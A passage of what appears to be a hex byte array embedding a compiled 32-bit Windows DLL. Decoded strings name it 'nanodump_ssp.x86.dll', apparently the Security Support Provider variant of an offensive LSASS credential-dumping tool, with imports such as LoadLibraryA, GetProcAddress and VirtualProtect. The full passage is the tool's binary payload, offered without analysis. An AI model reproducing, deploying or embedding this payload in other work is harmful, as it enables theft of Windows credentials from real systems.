0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xB4,0xC5,0x0C,0x04,0x04,0x00,0x20,0x00,0x00,0x00,0x44,0x01,0x00,0x00,0x1F,0xBC,0xFF,0xFF,0x93,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x02,0x8B,0xC5,0xC3,0x0C,0x04,0x04,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x28,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x78,0xBC,0xFF,0xFF,0xD5,0x02,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x48,0x87,0x03,0x83,0x04,0x03,0xC7,0x02,0xC3,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x21,0xBF,0xFF,0xFF,0x41,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x7B,0xC5,0x0C,0x04,0x04,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x1C,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x2C,0xBF,0xFF,0xFF,0x39,0x00,0x00,0x00,0x00,0x4C,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x62,0xC5,0x0C,0x04,0x04,0x00,0x00,0x24,0x00,0x00,0x00,0x3C,0x00,0x00,0x00,0x4C,0xBF,0xFF,0xFF,0x5A,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x75,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x44,0x0B,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x64,0x00,0x00,0x00,0x84,0xBF,0xFF,0xFF,0x1C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x24,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x78,0xBF,0xFF,0xFF,0x3F,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x50,0x0A,0xC5,0x0C,0x04,0x04,0x4D,0x0B,0x5C,0xC5,0x0C,0x04,0x04,0x00,0x00,0x30,0x00,0x00,0x00,0x44,0x00,0x00,0x00,0x90,0xBF,0xFF,0xFF,0x96,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x69,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x48,0x0B,0x6C,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x4C,0x0B,0x63,0xC5,0xC3,0x0C,0x04,0x04,0x10,0x00,0x00,0x00,0x78,0x00,0x00,0x00,0xFC,0xBF,0xFF,0xFF,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x18,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0xE0,0xBF,0xFF,0xFF,0x5A,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x41,0x83,0x03,0x2C,0x00,0x00,0x00,0x38,0x00,0x00,0x00,0x24,0xC0,0xFF,0xFF,0x57,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x43,0x87,0x03,0x86,0x04,0x83,0x05,0x02,0xBB,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x44,0x0B,0x00,0x3C,0x00,0x00,0x00,0x68,0x00,0x00,0x00,0x54,0xC1,0xFF,0xFF,0xEF,0x02,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x46,0x87,0x03,0x86,0x04,0x83,0x05,0x4E,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x46,0x0B,0x03,0xAB,0x02,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x41,0x0B,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x28,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0xEC,0xC3,0xFF,0xFF,0x71,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x46,0x87,0x03,0x86,0x04,0x83,0x05,0x02,0x64,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x24,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x40,0xC4,0xFF,0xFF,0x76,0x00,0x00,0x00,0x00,0x51,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x02,0x59,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x41,0x0B,0x00,0x00,0x2C,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x98,0xC4,0xFF,0xFF,0x88,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x52,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x47,0x0B,0x02,0x56,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x4A,0x0B,0x00,0x2C,0x00,0x00,0x00,0xA0,0x00,0x00,0x00,0xF8,0xC4,0xFF,0xFF,0xE5,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x72,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x47,0x0B,0x02,0x7E,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x42,0x0B,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x24,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0xA0,0xC5,0xFF,0xFF,0x2F,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x44,0x0D,0x05,0x58,0x0A,0xC5,0x0C,0x04,0x04,0x43,0x0B,0x49,0xC5,0x0C,0x04,0x04,0x00,0x00,0x24,0x00,0x00,0x00,0x44,0x00,0x00,0x00,0xA8,0xC5,0xFF,0xFF,0x46,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x45,0x86,0x03,0x83,0x04,0x7B,0xC3,0x41,0xC6,0x41,0xC5,0x0C,0x04,0x04,0x00,0x38,0x00,0x00,0x00,0x6C,0x00,0x00,0x00,0xD0,0xC5,0xFF,0xFF,0xAC,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x43,0x87,0x03,0x86,0x04,0x83,0x05,0x02,0x8D,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x4A,0x0B,0x48,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x00,0x00,0x24,0x00,0x00,0x00,0xA8,0x00,0x00,0x00,0x44,0xC6,0xFF,0xFF,0x86,0x00,0x00,0x00,0x00,0x7C,0x0E,0x08,0x85,0x02,0x4D,0x0D,0x05,0x41,0x86,0x03,0x48,0x83,0x04,0x71,0xC3,0x41,0xC6,0x41,0xC5,0x0C,0x04,0x04,0x10,0x00,0x00,0x00,0xD0,0x00,0x00,0x00,0xAC,0xC6,0xFF,0xFF,0x33,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x00,0xE4,0x00,0x00,0x00,0xD8,0xC6,0xFF,0xFF,0x7E,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x4D,0x0D,0x05,0x41,0x83,0x03,0x61,0x0A,0xC5,0xC3,0x0C,0x04,0x04,0x48,0x0B,0x02,0x45,0xC5,0xC3,0x0C,0x04,0x04,0x10,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x2C,0xC7,0xFF,0xFF,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x24,0x01,0x00,0x00,0x58,0xC7,0xFF,0xFF,0x8E,0x00,0x00,0x00,0x00,0x7C,0x0E,0x08,0x85,0x02,0x4D,0x0D,0x05,0x42,0x86,0x03,0x83,0x04,0x70,0x0A,0xC3,0x43,0xC6,0x41,0xC5,0x0C,0x04,0x04,0x41,0x0B,0x44,0xC3,0x41,0xC6,0x41,0xC5,0x0C,0x04,0x04,0x00,0x44,0x00,0x00,0x00,0x58,0x01,0x00,0x00,0xB4,0xC7,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x4D,0x0D,0x05,0x43,0x87,0x03,0x86,0x04,0x83,0x05,0x5D,0x0A,0xC3,0x43,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x45,0x0B,0x02,0x43,0x0A,0xC3,0x41,0xC6,0x43,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x48,0x0B,0x64,0xC3,0x41,0xC6,0x41,0xC7,0x47,0xC5,0x0C,0x04,0x04,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x10,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x14,0xC8,0xFF,0xFF,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x10,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x28,0xC8,0xFF,0xFF,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x1C,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x0C,0xC8,0xFF,0xFF,0x2C,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x44,0x0D,0x05,0x66,0xC5,0x0C,0x04,0x04,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x1C,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x04,0xC8,0xFF,0xFF,0x11,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0xC5,0x0C,0x04,0x04,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x24,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0xEC,0xC7,0xFF,0xFF,0x29,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x5E,0x0A,0xC5,0x0C,0x04,0x04,0x41,0x0B,0x46,0xC5,0x0C,0x04,0x04,0x00,0x00,0x2C,0x00,0x00,0x00,0x44,0x00,0x00,0x00,0xF4,0xC7,0xFF,0xFF,0xC6,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x46,0x87,0x03,0x86,0x04,0x83,0x05,0x02,0x44,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x48,0x0B,0x00,0x28,0x00,0x00,0x00,0x74,0x00,0x00,0x00,0x94,0xC8,0xFF,0xFF,0x69,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x46,0x87,0x03,0x86,0x04,0x83,0x05,0x02,0x5C,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x10,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x7C,0xC9,0xFF,0xFF,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x32,0xD0,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0xD0,0x00,0x00,0x2C,0xD0,0x00,0x00,0x30,0xD0,0x00,0x00,0x7D,0x5D,0x00,0x00,0x47,0xD0,0x00,0x00,0x00,0x00,0x6E,0x61,0x6E,0x6F,0x64,0x75,0x6D,0x70,0x5F,0x73,0x73,0x70,0x2E,0x78,0x38,0x36,0x2E,0x64,0x6C,0x6C,0x00,0x44,0x6C,0x6C,0x4D,0x61,0x69,0x6E,0x40,0x31,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3C,0xE0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0xE4,0x00,0x00,0xF0,0xE0,0x00,0x00,0x80,0xE0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x8C,0xE4,0x00,0x00,0x34,0xE1,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA4,0xE1,0x00,0x00,0xBC,0xE1,0x00,0x00,0xD4,0xE1,0x00,0x00,0xE2,0xE1,0x00,0x00,0xF2,0xE1,0x00,0x00,0x06,0xE2,0x00,0x00,0x18,0xE2,0x00,0x00,0x2A,0xE2,0x00,0x00,0x36,0xE2,0x00,0x00,0x42,0xE2,0x00,0x00,0x5E,0xE2,0x00,0x00,0x76,0xE2,0x00,0x00,0x86,0xE2,0x00,0x00,0x8E,0xE2,0x00,0x00,0x9C,0xE2,0x00,0x00,0xAE,0xE2,0x00,0x00,0x00,0x00,0x00,0x00,0xBE,0xE2,0x00,0x00,0xCC,0xE2,0x00,0x00,0xD8,0xE2,0x00,0x00,0xE0,0xE2,0x00,0x00,0xE8,0xE2,0x00,0x00,0xF2,0xE2,0x00,0x00,0xFE,0xE2,0x00,0x00,0x06,0xE3,0x00,0x00,0x10,0xE3,0x00,0x00,0x18,0xE3,0x00,0x00,0x22,0xE3,0x00,0x00,0x2E,0xE3,0x00,0x00,0x38,0xE3,0x00,0x00,0x42,0xE3,0x00,0x00,0x4C,0xE3,0x00,0x00,0x54,0xE3,0x00,0x00,0x5E,0xE3,0x00,0x00,0x66,0xE3,0x00,0x00,0x70,0xE3,0x00,0x00,0x7A,0xE3,0x00,0x00,0x84,0xE3,0x00,0x00,0x8E,0xE3,0x00,0x00,0x9C,0xE3,0x00,0x00,0xA8,0xE3,0x00,0x00,0xB0,0xE3,0x00,0x00,0xBA,0xE3,0x00,0x00,0xC4,0xE3,0x00,0x00,0x00,0x00,0x00,0x00,0xA4,0xE1,0x00,0x00,0xBC,0xE1,0x00,0x00,0xD4,0xE1,0x00,0x00,0xE2,0xE1,0x00,0x00,0xF2,0xE1,0x00,0x00,0x06,0xE2,0x00,0x00,0x18,0xE2,0x00,0x00,0x2A,0xE2,0x00,0x00,0x36,0xE2,0x00,0x00,0x42,0xE2,0x00,0x00,0x5E,0xE2,0x00,0x00,0x76,0xE2,0x00,0x00,0x86,0xE2,0x00,0x00,0x8E,0xE2,0x00,0x00,0x9C,0xE2,0x00,0x00,0xAE,0xE2,0x00,0x00,0x00,0x00,0x00,0x00,0xBE,0xE2,0x00,0x00,0xCC,0xE2,0x00,0x00,0xD8,0xE2,0x00,0x00,0xE0,0xE2,0x00,0x00,0xE8,0xE2,0x00,0x00,0xF2,0xE2,0x00,0x00,0xFE,0xE2,0x00,0x00,0x06,0xE3,0x00,0x00,0x10,0xE3,0x00,0x00,0x18,0xE3,0x00,0x00,0x22,0xE3,0x00,0x00,0x2E,0xE3,0x00,0x00,0x38,0xE3,0x00,0x00,0x42,0xE3,0x00,0x00,0x4C,0xE3,0x00,0x00,0x54,0xE3,0x00,0x00,0x5E,0xE3,0x00,0x00,0x66,0xE3,0x00,0x00,0x70,0xE3,0x00,0x00,0x7A,0xE3,0x00,0x00,0x84,0xE3,0x00,0x00,0x8E,0xE3,0x00,0x00,0x9C,0xE3,0x00,0x00,0xA8,0xE3,0x00,0x00,0xB0,0xE3,0x00,0x00,0xBA,0xE3,0x00,0x00,0xC4,0xE3,0x00,0x00,0x00,0x00,0x00,0x00,0x13,0x01,0x44,0x65,0x6C,0x65,0x74,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x34,0x01,0x45,0x6E,0x74,0x65,0x72,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0xAF,0x01,0x46,0x72,0x65,0x65,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x00,0x67,0x02,0x47,0x65,0x74,0x4C,0x61,0x73,0x74,0x45,0x72,0x72,0x6F,0x72,0x00,0x00,0x7B,0x02,0x47,0x65,0x74,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x48,0x61,0x6E,0x64,0x6C,0x65,0x41,0x00,0x00,0xB4,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x00,0x00,0xBA,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x48,0x65,0x61,0x70,0x00,0x00,0x4E,0x03,0x48,0x65,0x61,0x70,0x41,0x6C,0x6C,0x6F,0x63,0x00,0x54,0x03,0x48,0x65,0x61,0x70,0x46,0x72,0x65,0x65,0x00,0x00,0x6B,0x03,0x49,0x6E,0x69,0x74,0x69,0x61,0x6C,0x69,0x7A,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0xCB,0x03,0x4C,0x65,0x61,0x76,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0xCF,0x03,0x4C,0x6F,0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x41,0x00,0x00,0x66,0x05,0x53,0x6C,0x65,0x65,0x70,0x00,0x89,0x05,0x54,0x6C,0x73,0x47,0x65,0x74,0x56,0x61,0x6C,0x75,0x65,0x00,0xB9,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x00,0x00,0xBC,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x00,0x00,0x8E,0x00,0x5F,0x61,0x6D,0x73,0x67,0x5F,0x65,0x78,0x69,0x74,0x00,0x00,0x32,0x01,0x5F,0x69,0x6E,0x69,0x74,0x74,0x65,0x72,0x6D,0x00,0x36,0x01,0x5F,0x69,0x6F,0x62,0x00,0x00,0x99,0x01,0x5F,0x6C,0x6F,0x63,0x6B,0x00,0xE5,0x02,0x5F,0x75,0x6E,0x6C,0x6F,0x63,0x6B,0x00,0x22,0x03,0x5F,0x77,0x63,0x73,0x69,0x63,0x6D,0x70,0x00,0x00,0x9D,0x03,0x61,0x62,0x6F,0x72,0x74,0x00,0xAA,0x03,0x63,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x00,0xCC,0x03,0x66,0x72,0x65,0x65,0x00,0x00,0xD9,0x03,0x66,0x77,0x72,0x69,0x74,0x65,0x00,0x00,0x0A,0x04,0x6D,0x62,0x73,0x74,0x6F,0x77,0x63,0x73,0x00,0x00,0x0E,0x04,0x6D,0x65,0x6D,0x63,0x6D,0x70,0x00,0x00,0x0F,0x04,0x6D,0x65,0x6D,0x63,0x70,0x79,0x00,0x00,0x11,0x04,0x6D,0x65,0x6D,0x73,0x65,0x74,0x00,0x00,0x21,0x04,0x72,0x61,0x6E,0x64,0x00,0x00,0x22,0x04,0x72,0x65,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x32,0x04,0x73,0x72,0x61,0x6E,0x64,0x00,0x40,0x04,0x73,0x74,0x72,0x6C,0x65,0x6E,0x00,0x00,0x43,0x04,0x73,0x74,0x72,0x6E,0x63,0x6D,0x70,0x00,0x44,0x04,0x73,0x74,0x72,0x6E,0x63,0x70,0x79,0x00,0x47,0x04,0x73,0x74,0x72,0x72,0x63,0x68,0x72,0x00,0x52,0x04,0x73,0x77,0x70,0x72,0x69,0x6E,0x74,0x66,0x5F,0x73,0x00,0x00,0x65,0x04,0x76,0x66,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0xCD,0x02,0x74,0x69,0x6D,0x65,0x00,0x00,0x80,0x04,0x77,0x63,0x73,0x6E,0x63,0x61,0x74,0x00,0x83,0x04,0x77,0x63,0x73,0x6E,0x63,0x70,0x79,0x00,0x87,0x04,0x77,0x63,0x73,0x72,0x